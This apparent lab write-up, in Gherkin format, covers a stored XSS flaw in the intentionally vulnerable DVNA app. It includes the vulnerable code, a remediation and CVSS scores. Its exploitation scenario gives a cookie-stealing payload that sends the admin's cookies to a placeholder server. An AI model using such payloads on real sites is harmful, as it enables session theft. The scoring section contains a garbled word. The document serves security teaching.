## Version 1.4.2
## language: en

Feature:
  TOE:
    DVNA
  Category:
    Injection Flaws
  Location:
    /register - register_name, register_email (Parameters)
  CWE:
    CWE-0079: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting') -base-
      https://cwe.mitre.org/data/definitions/79.html
    CWE-0074: Improper Neutralization of Special Elements in Output Used by a
    Downstream Component ('Injection') -class-
      https://cwe.mitre.org/data/definitions/74.html
    CWE-0990: SFP Secondary Cluster: Tainted Input to Command -category-
      https://cwe.mitre.org/data/definitions/990.html
  CAPEC:
    CAPEC-592: Stored XSS -detailed-
      http://capec.mitre.org/data/definitions/592.html
    CAPEC-063: Cross-Site Scripting (XSS) -standard-
      http://capec.mitre.org/data/definitions/63.html
    CAPEC-242: Code Injection -meta-
      http://capec.mitre.org/data/definitions/242.html
  Rule:
    REQ.173: https://fluidattacks.com/web/es/rules/173/
  Goal:
    Execute JS in victim's browser
  Recommendation:
    Sanitize user input and properlly escape output

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running DVNA in a docker container at
    """
    http://localhost:8000/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/
    Then I can navigate the site

  Scenario: Static detection
  No access control
    Given I see the code at "/dvna/views/app/adminusers.ejs"
    """
    32  function appendUsers(users) {
    33      var table = document.getElementById('users-table'),i=0;
    34      var j = table.rows.length
    35      while(i<=users.length){
    36          var row = table.insertRow(j);
    37          var c_id = row.insertCell(0);
    38          var c_name = row.insertCell(1);
    39          var c_email = row.insertCell(2);
    40          c_id.innerHTML = users[i].id;
    41          c_name.innerHTML = users[i].name;
    42          c_email.innerHTML = users[i].email;
    43          i=i+1;
    44          j=j+1;
    45      }
    46  }
    """
    Then I see it's appending the raw api data without escaping it

  Scenario: Dynamic detection
  Fuzzing for XSS
    Given I go to "http://localhost:8000/register"
    And register a new user with name and email
    """
    <img src=# onerror=alert(1)></img>
    """
    Then I go to the users list at "/app/admin/users"
    Then I get two alerts, confirming an XSS vulnerability

  Scenario: Exploitation
  Stealing user cookies
    Given I inject a cookie stealing payload into user
    """
    <img src=# onerror=document.location="http://myserver/?c="+document.cookie>
    </img>
    """
    Then when the admin goes to the user list, I get their cookies
    And can hijack the admin session

  Scenario: Remediation
  Access control
    Given I patch the code like this
    """
    32  function appendUsers(users) {
    33      var table = document.getElementById('users-table'),i=0;
    34      var j = table.rows.length
    35      while(i<=users.length){
    36          var row = table.insertRow(j);
    37          var c_id = row.insertCell(0);
    38          var c_name = row.insertCell(1);
    39          var c_email = row.insertCell(2);
    40          c_id.innerHTML = escapeHTML(users[i].id);
    41          c_name.innerHTML = escapeHTML(users[i].name);
    42          c_email.innerHTML = escapeHTML(users[i].email);
    43          i=i+1;
    44          j=j+1;
    45      }
    46  }
    """
    Then the output is html escaped and XSS is not posible anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.3/10 (Medium) - AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    5.9/10 (Medium) - E:F/RL:O/RC:C/
  En4.9onmental: Unique and relevant attributes to a specific user environment
    5.9/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-25
